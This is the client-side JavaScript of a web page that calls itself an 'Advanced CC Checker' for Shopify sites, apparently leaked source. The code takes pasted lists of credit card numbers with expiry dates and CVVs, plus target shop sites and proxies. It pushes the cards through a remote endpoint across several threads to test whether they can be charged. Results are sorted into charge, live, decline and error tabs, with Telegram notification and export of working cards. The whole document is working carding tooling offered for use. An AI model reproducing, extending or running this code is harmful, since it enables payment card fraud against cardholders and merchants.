            urls = urls.concat(fullUrls);
            
            const domains = text.match(domainRegex) || [];
            domains.forEach(domain => {
                if (!domain.startsWith('http')) {
                    urls.push('https://' + domain);
                }
            });
            
            return urls;
        }

        // Fix URL format
        function fixUrl(url) {
            if (!url) return null;
            
            url = url.replace(/.*?(https?:\/\/[^\s]+).*/i, '$1');
            
            if (!/^https?:\/\//i.test(url)) {
                url = 'https://' + url;
            }
            
            try {
                const urlObj = new URL(url);
                return `${urlObj.protocol}//${urlObj.hostname}/`;
            } catch (e) {
                return null;
            }
        }

        // Auto Clean Cards Function
        function autoCleanCards() {
            const input = document.getElementById('cardsInput').value;
            if (!input.trim()) return;

            const lines = input.split('\n');
            const cleanedCards = new Set();

            lines.forEach(line => {
                const cards = extractCards(line);
                cards.forEach(card => cleanedCards.add(card));
            });

            if (cleanedCards.size > 0) {
                const cleaned = Array.from(cleanedCards);
                document.getElementById('cardsInput').value = cleaned.join('\n');
                document.getElementById('cardsStatus').textContent = `✓ Auto-formatted ${cleaned.length} valid cards`;
                document.getElementById('cardsStatus').className = 'status-display success';
                logToConsole(`Auto-formatted ${cleaned.length} valid cards`, 'success');
            }
        }

        // Extract and format credit cards
        function extractCards(text) {
            const patterns = [
                /(\d{13,19})\s*[\|:\/\s]\s*(\d{1,2})\s*[\|:\/\s]\s*(\d{2,4})\s*[\|:\/\s]\s*(\d{3,4})/g,
                /(\d{13,19})\s*\(\s*(\d{1,2})\s*\/\s*(\d{2,4})\s*\)\s*(?:cvv?:?\s*)?(\d{3,4})/gi,
                /(?:card:?\s*)?(\d{13,19})\s*(?:exp:?\s*)?(\d{1,2})\s*\/\s*(\d{2,4})\s*(?:cvv?:?\s*)?(\d{3,4})/gi,
                /(\d{4})\s+(\d{4})\s+(\d{4})\s+(\d{4})\s+(\d{1,2})\s+(\d{2,4})\s+(\d{3,4})/g
            ];

            const cards = [];

            patterns.forEach(pattern => {
                let match;
                while ((match = pattern.exec(text)) !== null) {
                    let cardNumber, month, year, cvv;
                    
                    if (match.length === 5) {
                        [, cardNumber, month, year, cvv] = match;
                    } else if (match.length === 8) {
                        cardNumber = match[1] + match[2] + match[3] + match[4];
                        month = match[5];
                        year = match[6];
                        cvv = match[7];
                    }
                    
                    cardNumber = cardNumber.replace(/\D/g, '');
                    month = month.padStart(2, '0');
                    if (year.length === 2) {
                        year = '20' + year;
                    }
                    
                    if (cardNumber.length >= 13 && cardNumber.length <= 19 &&
                        month >= '01' && month <= '12' &&
                        year >= '2024' && year <= '2035' &&
                        cvv.length >= 3 && cvv.length <= 4) {
                        
                        const formattedCard = `${cardNumber}|${month}|${year}|${cvv}`;
                        cards.push(formattedCard);
                    }
                }
            });

            return [...new Set(cards)];
        }

        // Auto Clean Proxies Function
        function autoCleanProxies() {
            const input = document.getElementById('proxiesInput').value;
            if (!input.trim()) return;

            const lines = input.split('\n');
            const cleanedProxies = new Set();

            lines.forEach(line => {
                const proxy = extractProxy(line);
                if (proxy) cleanedProxies.add(proxy);
            });

            if (cleanedProxies.size > 0) {
                const cleaned = Array.from(cleanedProxies);
                document.getElementById('proxiesInput').value = cleaned.join('\n');
                document.getElementById('proxiesStatus').textContent = `✓ Auto-formatted ${cleaned.length} valid proxies`;
                document.getElementById('proxiesStatus').className = 'status-display success';
                logToConsole(`Auto-formatted ${cleaned.length} valid proxies`, 'success');
            }
        }

        // Extract and format proxy
        function extractProxy(text) {
            const proxyPatterns = [
                /(\d+\.\d+\.\d+\.\d+):(\d+):([^:\s]+):([^\s]+)/g,
                /(\d+\.\d+\.\d+\.\d+):(\d+)/g,
                /([a-zA-Z0-9.-]+):(\d+):([^:\s]+):([^\s]+)/g,
                /([a-zA-Z0-9.-]+):(\d+)/g
            ];

            for (const pattern of proxyPatterns) {
                const match = pattern.exec(text);
                if (match) {
                    return match[0];
                }
            }
            return null;
        }

        // Enhanced Log to Console Function
        function logToConsole(message, type = 'info', data = null) {
            const consoleContainer = document.getElementById('consoleContainer');
            const timestamp = new Date().toLocaleTimeString();
            
            const logItem = document.createElement('div');
            logItem.className = 'console-item';
            
            let typeClass = 'console-info';
            let icon = 'ℹ';
            
            switch (type) {
                case 'success':
                    typeClass = 'console-action';
                    icon = '✓';
                    break;
                case 'error':
                    typeClass = 'console-error';
                    icon = '✗';
                    break;
                case 'warning':
                    typeClass = 'console-warning';
                    icon = '⚠';
                    break;
                case 'request':
                    typeClass = 'console-info';
                    icon = '→';
                    break;
            }
            
            logItem.innerHTML = `
                <span class="console-timestamp">[${timestamp}]</span>
                <span class="${typeClass}"> ${icon} ${message}</span>
                ${data ? `<div class="console-text">${JSON.stringify(data, null, 2)}</div>` : ''}
            `;
            
            consoleContainer.insertBefore(logItem, consoleContainer.firstChild);
            
            // Keep only last 100 console entries
            while (consoleContainer.children.length > 100) {
                consoleContainer.removeChild(consoleContainer.lastChild);
            }

            // Animate new log entry
            gsap.fromTo(logItem, 
                { opacity: 0, x: -10 }, 
                { opacity: 1, x: 0, duration: 0.3, ease: "power2.out" }
            );
        }

        // Check endpoint health
        async function checkEndpointHealth() {
            try {
                const healthIndicator = document.getElementById('healthIndicator');
                healthIndicator.className = 'health-indicator checking';
                healthIndicator.title = 'Checking endpoint health...';
                
                logToConsole('Checking endpoint health...', 'info');
                
                const response = await fetch(API_ENDPOINT, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify({ action: 'health_check' })
                });

                if (response.ok) {
                    const result = await response.json();
                    
                    if (result.success && result.status === 'healthy') {
                        healthStatus = 'healthy';
                        healthIndicator.className = 'health-indicator healthy';
                        healthIndicator.title = ' endpoint is healthy';
                        logToConsole(' endpoint health: HEALTHY', 'success');
                    } else {
                        healthStatus = 'unhealthy';
                        healthIndicator.className = 'health-indicator unhealthy';
                        healthIndicator.title = 'Single endpoint is unhealthy';
                        logToConsole('Single endpoint health: UNHEALTHY', 'warning');
                    }
                } else {
                    healthStatus = 'unhealthy';
                    healthIndicator.className = 'health-indicator unhealthy';
                    healthIndicator.title = 'Health check failed';
                    logToConsole('Health check failed', 'error');
                }
            } catch (error) {
                healthStatus = 'unhealthy';
                const healthIndicator = document.getElementById('healthIndicator');
                healthIndicator.className = 'health-indicator unhealthy';
                healthIndicator.title = 'Health check error: ' + error.message;
                logToConsole('Health check error: ' + error.message, 'error');
            }
        }

        // Handle file upload with auto-cleaning
        async function handleFileUpload(input, type) {
            const file = input.files[0];
            if (!file) return;

            try {
                const text = await file.text();
                let textarea, status, cleanFunction;
                
                switch(type) {
                    case 'sites':
                        textarea = document.getElementById('sitesInput');
                        status = document.getElementById('sitesStatus');
                        cleanFunction = autoCleanSites;
                        break;
                    case 'cards':
                        textarea = document.getElementById('cardsInput');
                        status = document.getElementById('cardsStatus');
                        cleanFunction = autoCleanCards;
                        break;
                    case 'proxies':
                        textarea = document.getElementById('proxiesInput');
                        status = document.getElementById('proxiesStatus');
                        cleanFunction = autoCleanProxies;
                        break;
                }
                
                textarea.value = text;
                status.textContent = `Loaded ${file.name} successfully`;
                status.className = 'status-display success';
                
                setTimeout(cleanFunction, 100);
                
                gsap.fromTo(textarea, 
                    { scale: 0.98, opacity: 0.8 }, 
                    { scale: 1, opacity: 1, duration: 0.3, ease: "power2.out" }
                );

                logToConsole(`File uploaded: ${file.name} (${type})`, 'success');
                showNotification(`${file.name} uploaded and auto-cleaned`, 'success');
            } catch (error) {
                const status = type === 'sites' ? document.getElementById('sitesStatus') : 
                             type === 'cards' ? document.getElementById('cardsStatus') : 
                             document.getElementById('proxiesStatus');
                status.textContent = 'Error loading file';
                status.className = 'status-display error';
                logToConsole(`File upload error: ${error.message}`, 'error');
                showNotification('Error loading file', 'error');
            }
        }

        // Enhanced Start checking with 5 Threading and 
        async function startChecking() {
            const sites = document.getElementById('sitesInput').value.trim().split('\n').filter(s => s.trim());
            const cards = document.getElementById('cardsInput').value.trim().split('\n').filter(c => c.trim());
            const proxies = document.getElementById('proxiesInput').value.trim().split('\n').filter(p => p.trim());
            
            const threadDelay = parseInt(document.getElementById('threadDelay').value) || 100;

            if (sites.length === 0) {
                showNotification('Please enter site URLs', 'error');
                logToConsole('Start failed: No sites provided', 'error');
                return;
            }

            if (cards.length === 0) {
                showNotification('Please enter credit cards', 'error');
                logToConsole('Start failed: No cards provided', 'error');
                return;
            }

            if (proxies.length === 0) {
                showNotification('Proxies are required for processing', 'error');
                logToConsole('Start failed: No proxies provided', 'error');
                return;
            }

            if (healthStatus === 'unhealthy') {
                showNotification('Warning: Endpoint is unhealthy. Processing may fail.', 'warning');
                logToConsole('Warning: Starting with unhealthy endpoint', 'warning');
            }

            isChecking = true;
            document.getElementById('loading').style.display = 'block';
            
            // Reset stats for 4-tab system
            stats = { charge: 0, live: 0, decline: 0, error: 0, total: 0 };
            results = { charge: [], live: [], decline: [], error: [] };
            devStats = { totalRequests: 0, successfulRequests: 0, totalTime: 0 };
            updateStats();
            clearResults();

            // Configure thread manager for 5 threads
            threadManager = new ThreadManager();
            threadManager.updateDelay(threadDelay);
            threadManager.start();

            logToConsole(`Starting 5-thread processing: ${cards.length} cards, ${sites.length} sites, ${proxies.length} proxies`, 'success');
            logToConsole(`Thread configuration: 5 threads with ${threadDelay}ms delay`, 'info');
            logToConsole('4-Tab System: Charge, Live+3DS, Decline, Errors (with recheck)', 'info');
            showNotification(`Starting: 5 threads processing ${cards.length} cards`, 'info');

            // Process cards with 5 threading
            const promises = cards.map((card, index) => {
                const site = sites[index % sites.length];
                const proxy = proxies[index % proxies.length];
                
                return threadManager.addTask(async () => {
                    if (!isChecking) return;
                    
                    try {
                        logToConsole(`Processing card ${index + 1}/${cards.length}: ${card.substring(0, 8)}**** on ${new URL(site).hostname}`, 'request');
                        await checkSingleCard(card.trim(), site, proxy, index + 1, sites);
                    } catch (error) {
                        logToConsole(`Processing error card ${index + 1}: ${error.message}`, 'error');
                        addResult(card, site, 'Error', 'Processing error: ' + error.message, 'error');
                    }
                });
            });

            // Wait for all threads to complete
            try {
                await Promise.all(promises);
                logToConsole('All cards processed successfully with 5 thread', 'success');
            } catch (error) {
                logToConsole('Some cards failed to process: ' + error.message, 'error');
            } finally {
                stopChecking();
            }
        }

        // Enhanced Check single card
        async function checkSingleCard(card, site, proxy, cardNumber, allSites) {
            const startTime = Date.now();
            devStats.totalRequests++;
            
            try {
                const requestData = {
                    action: 'check_card',
                    site: site,
                    cc: card,
                    proxy: proxy,
                    telegram_chat_id: settings.telegramChatId
                };

                const controller = new AbortController();
                const timeoutId = setTimeout(() => controller.abort(), settings.requestTimeout * 1000);

                const response = await fetch(API_ENDPOINT, {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json',
                    },
                    body: JSON.stringify(requestData),
                    signal: controller.signal
                });

                clearTimeout(timeoutId);

                const endTime = Date.now();
                const processingTime = endTime - startTime;
                devStats.totalTime += processingTime;

                // Enhanced JSON parsing with error handling
                let result;
                try {
                    const responseText = await response.text();
                    
                    if (!responseText.trim()) {
                        throw new Error('Empty response from server');
                    }

                    try {
                        result = JSON.parse(responseText);
                    } catch (jsonError) {
                        logToConsole(`Card ${cardNumber}: JSON parse error, treating as plain text`, 'warning');
                        result = {
                            success: true,
                            response: responseText,
                            status: 'error', // JSON errors go to error category
                            keyword_found: 'JSON Parse Error'
                        };
                    }
                } catch (textError) {
                    throw new Error('Failed to read response: ' + textError.message);
                }

                if (result && result.success !== false) {
                    devStats.successfulRequests++;
                    const status = result.status || 'decline'; // Default to decline if unknown
                    const responseText = result.response || result.data || 'No response';
                    const keywordFound = result.keyword_found || null;
                    const apiProcessingTime = result.processing_time || processingTime + 'ms';

                    logToConsole(`Card ${cardNumber}: ${status.toUpperCase()} - ${keywordFound || 'auto-detected'} (${processingTime}ms)`, 
                        status === 'charge' || status === 'live' ? 'success' : status === 'error' ? 'error' : 'info');

                    // Add special error recheck functionality
                    if (status === 'error' && allSites && allSites.length > 1) {
                        addResultWithRecheck(card, site, status.toUpperCase(), responseText, status, keywordFound, apiProcessingTime, allSites, proxy);
                    } else {
                        addResult(card, site, status.toUpperCase(), responseText, status, keywordFound, apiProcessingTime);
                    }
                } else {
                    const errorMsg = result?.error || 'Unknown error from API';
                    logToConsole(`Card ${cardNumber}: API ERROR - ${errorMsg}`, 'error');
                    
                    if (allSites && allSites.length > 1) {
                        addResultWithRecheck(card, site, 'Error', errorMsg, 'error', null, '0ms', allSites, proxy);
                    } else {
                        addResult(card, site, 'Error', errorMsg, 'error');
                    }
                }
            } catch (error) {
                const endTime = Date.now();
                const processingTime = endTime - startTime;
                devStats.totalTime += processingTime;
                
                let errorMessage = error.message;
                if (error.name === 'AbortError') {
                    errorMessage = `Request timeout after ${settings.requestTimeout} seconds`;
                } else if (error.message.includes('fetch')) {
                    errorMessage = 'Network connection failed';
                }
                
                logToConsole(`Card ${cardNumber}: CONNECTION ERROR - ${errorMessage}`, 'error');
                
                if (allSites && allSites.length > 1) {
                    addResultWithRecheck(card, site, 'Error', errorMessage, 'error', null, processingTime + 'ms', allSites, proxy);
                } else {
                    addResult(card, site, 'Error', errorMessage, 'error');
                }
            }
        }

        // Add result to display with enhanced information for 4-tab system
        function addResult(card, site, status, response, type, keyword = null, processingTime = '0s') {
            const container = document.getElementById('resultsContainer');
            const resultDiv = document.createElement('div');
            resultDiv.className = `result-item ${type}`;
            
            const maskedCard = card.substring(0, 6) + '****' + card.substring(card.length - 4);
            const maskedSite = new URL(site).hostname;
            
            resultDiv.innerHTML = `
                <div class="result-card ${type}">${maskedCard} - ${status}</div>
                <div class="result-details">
                    Site: ${maskedSite} | Time: ${processingTime}<br>
                    Response: ${response.substring(0, 50)}${response.length > 50 ? '...' : ''}
                    ${keyword ? `<div class="result-keyword">${keyword}</div>` : ''}
                </div>
            `;

            container.insertBefore(resultDiv, container.firstChild);

            // Animate new result
            gsap.fromTo(resultDiv, 
                { opacity: 0, x: -20 }, 
                { opacity: 1, x: 0, duration: 0.5, ease: "power2.out" }
            );

            // Keep only last 30 results
            while (container.children.length > 30) {
                container.removeChild(container.lastChild);
            }

            // Update stats for 4-tab system
            if (stats.hasOwnProperty(type)) {
                stats[type]++;
                stats.total++;
                results[type].push({ card, site, status, response, keyword, processingTime });
                updateStats();
            }
        }

        // Add result with recheck functionality for ERROR category
        function addResultWithRecheck(card, site, status, response, type, keyword = null, processingTime = '0s', allSites, proxy) {
            const container = document.getElementById('resultsContainer');
            const resultDiv = document.createElement('div');
            resultDiv.className = `result-item ${type}`;
            
            const maskedCard = card.substring(0, 6) + '****' + card.substring(card.length - 4);
            const maskedSite = new URL(site).hostname;
            
            // Add recheck button for errors
            const recheckBtn = type === 'error' ? `<div class="recheck-btn" onclick="recheckWithDifferentSite('${card}', '${site}', '${proxy}', this)">Recheck</div>` : '';
            
            resultDiv.innerHTML = `
                ${recheckBtn}
                <div class="result-card ${type}">${maskedCard} - ${status}</div>
                <div class="result-details">
                    Site: ${maskedSite} | Time: ${processingTime}<br>
                    Response: ${response.substring(0, 50)}${response.length > 50 ? '...' : ''}
                    ${keyword ? `<div class="result-keyword">${keyword}</div>` : ''}
                </div>
            `;

            container.insertBefore(resultDiv, container.firstChild);

            // Store recheck data
            if (type === 'error') {
                errorRecheckQueue.push({
                    card: card,
                    originalSite: site,
                    proxy: proxy,
                    allSites: allSites,
                    element: resultDiv
                });
            }

            // Animate new result
            gsap.fromTo(resultDiv, 
                { opacity: 0, x: -20 }, 
                { opacity: 1, x: 0, duration: 0.5, ease: "power2.out" }
            );

            // Keep only last 30 results
            while (container.children.length > 30) {
                container.removeChild(container.lastChild);
            }

            // Update stats for 4-tab system
            if (stats.hasOwnProperty(type)) {
                stats[type]++;
                stats.total++;
                results[type].push({ card, site, status, response, keyword, processingTime });
                updateStats();
            }
        }

        // Recheck with different site function
        async function recheckWithDifferentSite(card, originalSite, proxy, buttonElement) {
            const recheckData = errorRecheckQueue.find(r => r.card === card && r.originalSite === originalSite);
            if (!recheckData) {
                showNotification('Recheck data not found', 'error');
                return;
            }

            // Find a different site
            const availableSites = recheckData.allSites.filter(site => site !== originalSite);
            if (availableSites.length === 0) {
                showNotification('No alternative sites available for recheck', 'warning');
                return;
            }

            const newSite = availableSites[Math.floor(Math.random() * availableSites.length)];
            
            // Update button state
            buttonElement.textContent = 'Rechecking...';
            buttonElement.style.pointerEvents = 'none';
            buttonElement.style.opacity = '0.5';

            logToConsole(`Rechecking ${card.substring(0, 8)}**** with different site: ${new URL(newSite).hostname}`, 'info');

            try {
                // Remove from error stats temporarily
                stats.error--;
                stats.total--;
                updateStats();

                // Perform recheck
                await checkSingleCard(card, newSite, proxy, 'recheck', recheckData.allSites);
                
                // Remove original error result
                if (recheckData.element && recheckData.element.parentNode) {
                    recheckData.element.parentNode.removeChild(recheckData.element);
                }

                // Remove from recheck queue
                const index = errorRecheckQueue.indexOf(recheckData);
                if (index > -1) {
                    errorRecheckQueue.splice(index, 1);
                }

                logToConsole(`Recheck completed for ${card.substring(0, 8)}**** on ${new URL(newSite).hostname}`, 'success');
                showNotification('Recheck completed with different site', 'success');

            } catch (error) {
                // Restore button state on error
                buttonElement.textContent = 'Recheck';
                buttonElement.style.pointerEvents = 'auto';
                buttonElement.style.opacity = '1';
                
                // Restore error stats
                stats.error++;
                stats.total++;
                updateStats();

                logToConsole(`Recheck failed: ${error.message}`, 'error');
                showNotification('Recheck failed', 'error');
            }
        }

        // Update stats display with animations for 4-tab system
        function updateStats() {
            document.getElementById('chargeCount').textContent = stats.charge;
            document.getElementById('liveCount').textContent = stats.live;
            document.getElementById('declineCount').textContent = stats.decline;
            document.getElementById('errorCount').textContent = stats.error;

            // Animate updated stat
            Object.keys(stats).forEach(key => {
                if (key !== 'total') {
                    const elementId = key === 'decline' ? 'declineCount' : key + 'Count';
                    const element = document.getElementById(elementId);
                    if (element) {
                        gsap.fromTo(element, 
                            { scale: 1.2, textShadow: '0 0 20px currentColor' }, 
                            { scale: 1, textShadow: '0 0 10px currentColor', duration: 0.3, ease: "power2.out" }
                        );
                    }
                }
            });
        }

        // Enhanced Stop checking
        function stopChecking() {
            isChecking = false;
            threadManager.stop();
            document.getElementById('loading').style.display = 'none';

            const totalResults = stats.charge + stats.live + stats.decline + stats.error;
            logToConsole(`Processing completed: ${totalResults} cards processed with 50 threads (400s timeout)`, 'success');
            logToConsole(`Results: ${stats.charge} Charge, ${stats.live} Live+3DS, ${stats.decline} Decline, ${stats.error} Errors`, 'info');
            showNotification(`Completed! Processed ${totalResults} cards - 4-Tab System`, 'success');
            
            updateThreadStatus();
        }

        // Clear all data
        function clearAll() {
            stopChecking();
            
            document.getElementById('sitesInput').value = '';
            document.getElementById('cardsInput').value = '';
            document.getElementById('proxiesInput').value = '';
            document.getElementById('sitesStatus').textContent = 'Ready for auto-cleaning URLs';
            document.getElementById('sitesStatus').className = 'status-display';
            document.getElementById('cardsStatus').textContent = 'Ready for auto-formatting cards';
            document.getElementById('cardsStatus').className = 'status-display';
            document.getElementById('proxiesStatus').textContent = 'Proxies required for processing';
            document.getElementById('proxiesStatus').className = 'status-display';
            
            // Reset 4-tab system
            stats = { charge: 0, live: 0, decline: 0, error: 0, total: 0 };
            results = { charge: [], live: [], decline: [], error: [] };
            devStats = { totalRequests: 0, successfulRequests: 0, totalTime: 0 };
            errorRecheckQueue = [];
            updateStats();
            clearResults();
            document.getElementById('consoleContainer').innerHTML = '';

            updateThreadStatus();
            logToConsole('All data cleared - 4-tab system reset', 'info');
            showNotification('All data cleared - 4-tab system ready', 'info');
        }

        // Clear results
        function clearResults() {
            document.getElementById('resultsContainer').innerHTML = '';
        }

        // Download results with enhanced format for 4-tab system
        function downloadResults(type) {
            if (!results[type] || results[type].length === 0) {
                showNotification(`No ${type} results to download`, 'warning');
                logToConsole(`Download failed: No ${type} results available`, 'warning');
                return;
            }

            const typeNames = {
                charge: 'CHARGE',
                live: 'LIVE+3DS',
                decline: 'DECLINE',
                error: 'ERRORS'
            };

            const content = results[type].map(r => 
                `${r.card} | ${r.site} | ${r.status} | ${r.keyword || 'N/A'} | ${r.processingTime || 'N/A'} | ${r.response}`
            ).join('\n');
            
            const blob = new Blob([content], { type: 'text/plain' });
            const url = URL.createObjectURL(blob);
            const a = document.createElement('a');
            a.href = url;
            a.download = `${typeNames[type]}_cards_${new Date().toISOString().slice(0,10)}.txt`;
            a.click();
            URL.revokeObjectURL(url);

            logToConsole(`Downloaded ${results[type].length} ${typeNames[type]} cards to file`, 'success');
            showNotification(`Downloaded ${results[type].length} ${typeNames[type]} cards`, 'success');
        }

        // Settings functions
        function openSettings() {
            document.getElementById('settingsModal').style.display = 'block';
            document.getElementById('telegramChatId').value = settings.telegramChatId;
            document.getElementById('requestTimeout').value = settings.requestTimeout;
            document.getElementById('maxRetries').value = settings.maxRetries;
            
            gsap.fromTo('.modal-content', 
                { scale: 0.8, opacity: 0 }, 
                { scale: 1, opacity: 1, duration: 0.3, ease: "power2.out" }
            );

            logToConsole('Settings modal opened (400s timeout edition)', 'info');
        }

        function closeSettings() {
            gsap.to('.modal-content', {
                scale: 0.8,
                opacity: 0,
                duration: 0.3,
                ease: "power2.in",
                onComplete: () => {
                    document.getElementById('settingsModal').style.display = 'none';
                }
            });

            logToConsole('Settings modal closed', 'info');
        }

        function saveSettings() {
            settings.telegramChatId = document.getElementById('telegramChatId').value.trim();
            settings.requestTimeout = parseInt(document.getElementById('requestTimeout').value) || 400;
            settings.maxRetries = parseInt(document.getElementById('maxRetries').value) || 2;
            
            localStorage.setItem('ccCheckerSettings', JSON.stringify(settings));
            
            closeSettings();
            logToConsole(`Settings saved: Timeout=${settings.requestTimeout}s, Retries=${settings.maxRetries}`, 'success');
            showNotification('Settings saved successfully (400s timeout)', 'success');
        }

        // Load settings
        function loadSettings() {
            const saved = localStorage.getItem('ccCheckerSettings');
            if (saved) {
                try {
                    settings = { ...settings, ...JSON.parse(saved) };
                    logToConsole('Settings loaded from storage', 'info');
                } catch (error) {
                    logToConsole('Error loading settings: ' + error.message, 'error');
                }
            }
        }

        // Show enhanced notification
        function showNotification(message, type = 'info') {
            const colors = {
                success: '#22c55e',
                error: '#ef4444',
                warning: '#fbbf24',
                info: '#3b82f6'
            };

            const notification = document.createElement('div');
            notification.style.cssText = `
                position: fixed;
                top: 60px;
                right: 20px;
                background: ${colors[type]};
                color: white;
                padding: 12px 20px;
                border-radius: 12px;
                font-size: 13px;
                font-weight: 500;
                z-index: 1001;
                box-shadow: 0 4px 20px rgba(0,0,0,0.3);
                transform: translateX(100%);
                transition: transform 0.3s ease;
                max-width: 320px;
                backdrop-filter: blur(10px);
                font-family: 'Inter', sans-serif;
            `;
            notification.textContent = message;
            document.body.appendChild(notification);

            setTimeout(() => {
                notification.style.transform = 'translateX(0)';
            }, 100);

            setTimeout(() => {
                notification.style.transform = 'translateX(100%)';
                setTimeout(() => {
                    if (document.body.contains(notification)) {
                        document.body.removeChild(notification);
                    }
                }, 300);
            }, 4000);
        }

        // Close modal when clicking outside
        window.onclick = function(event) {
            const modal = document.getElementById('settingsModal');
            if (event.target === modal) {
                closeSettings();
            }
        };

        // Enhanced Keyboard shortcuts
        document.addEventListener('keydown', function(e) {
            if (e.ctrlKey || e.metaKey) {
                switch(e.key.toLowerCase()) {
                    case ' ':
                        e.preventDefault();
                        if (isChecking) {
                            stopChecking();
                        } else {
                            startChecking();
                        }
                        break;
                    case 'c':
                        e.preventDefault();
                        clearAll();
                        break;
                    case 's':
                        e.preventDefault();
                        openSettings();
                        break;
                    case 'h':
                        e.preventDefault();
                        checkEndpointHealth();
                        break;
                    case '1':
                        e.preventDefault();
                        downloadResults('charge');
                        break;
                    case '2':
                        e.preventDefault();
                        downloadResults('live');
                        break;
                    case '3':
                        e.preventDefault();
                        downloadResults('decline');
                        break;
                    case '4':
                        e.preventDefault();
                        downloadResults('error');
                        break;
                }
            }
        });

        // Initialize app
        document.addEventListener('DOMContentLoaded', function() {
            initParticles();
            loadSettings();
            checkEndpointHealth();
            updateThreadStatus();
            
            setInterval(checkEndpointHealth, 5 * 60 * 1000);
            
            gsap.timeline()
                .fromTo('.header h1', 
                    { y: -50, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 1, ease: "power3.out" })
                .fromTo('.input-section', 
                    { y: 30, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 0.8, stagger: 0.15, ease: "power3.out" }, "-=0.5")
                .fromTo('.thread-config', 
                    { y: 30, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 0.8, ease: "power3.out" }, "-=0.3")
                .fromTo('.controls', 
                    { y: 30, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 0.8, ease: "power3.out" }, "-=0.2")
                .fromTo('.stats-section', 
                    { y: 30, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 0.8, ease: "power3.out" }, "-=0.1")
                .fromTo('.developer-info-section', 
                    { y: 30, opacity: 0 }, 
                    { y: 0, opacity: 1, duration: 0.8, ease: "power3.out" }, "-=0.1");

            logToConsole('Advanced CC Checker - Tabs', 'success');
            logToConsole('Features: 5 threads,error recheck', 'info');
            logToConsole('Categories: 1) Charge 2) Live 3) Decline 4) Errors (with recheck)', 'info');
            logToConsole('endpoint: https://chut.com', 'info');
            logToConsole('Keyboard shortcuts: Ctrl+Space (Start/Stop), Ctrl+1-4 (Download tabs)', 'info');
            logToConsole('Src Leaked By: BasicCoders', 'info');
            logToConsole('Ready for 5-thread processing...', 'success');

            console.log('🚀 Autoshopify CC Checker - sex + Fastest');
            console.log('🔄 Error recheck with different sites');
            console.log('👨‍💻 Src Leak By BasicCoders');
        });

        // Export enhanced global functions for 4-tab system
        window.ccChecker = {
            startChecking,
            stopChecking,
            clearAll,
            autoCleanSites,
            autoCleanCards,
            autoCleanProxies,
            logToConsole,
            showNotification,
            checkEndpointHealth,
            recheckWithDifferentSite,
            getStats: () => stats,
            getResults: () => results,
            getSettings: () => settings,
            downloadResults,
            openSettings,
            updateThreadStatus,
            threadManager: () => threadManager,
            version: '4.0.0',
            author: 'Rohit Vishal and sestrgqqqq',
            description: '4 Tabs + 400s Timeout + Error Recheck Edition',
            features: [
                'Fixed 5-thread processing',
                '400-second timeout system', 
                '4-tab categorization system',
                'Error recheck with different sites',
                'Combined Live+3ds category',
                'Auto URL/Card/Proxy cleaning',
                'Real-time console logging',
                'Enhanced keyword detection',
                'Telegram notifications',
                'JSON response parsing',
                'Memory optimization',
                'Keyboard shortcuts (Ctrl+1-4 for downloads)'
            ]
        };
    </script>
</body>
</html>


<!-- 🧠 -->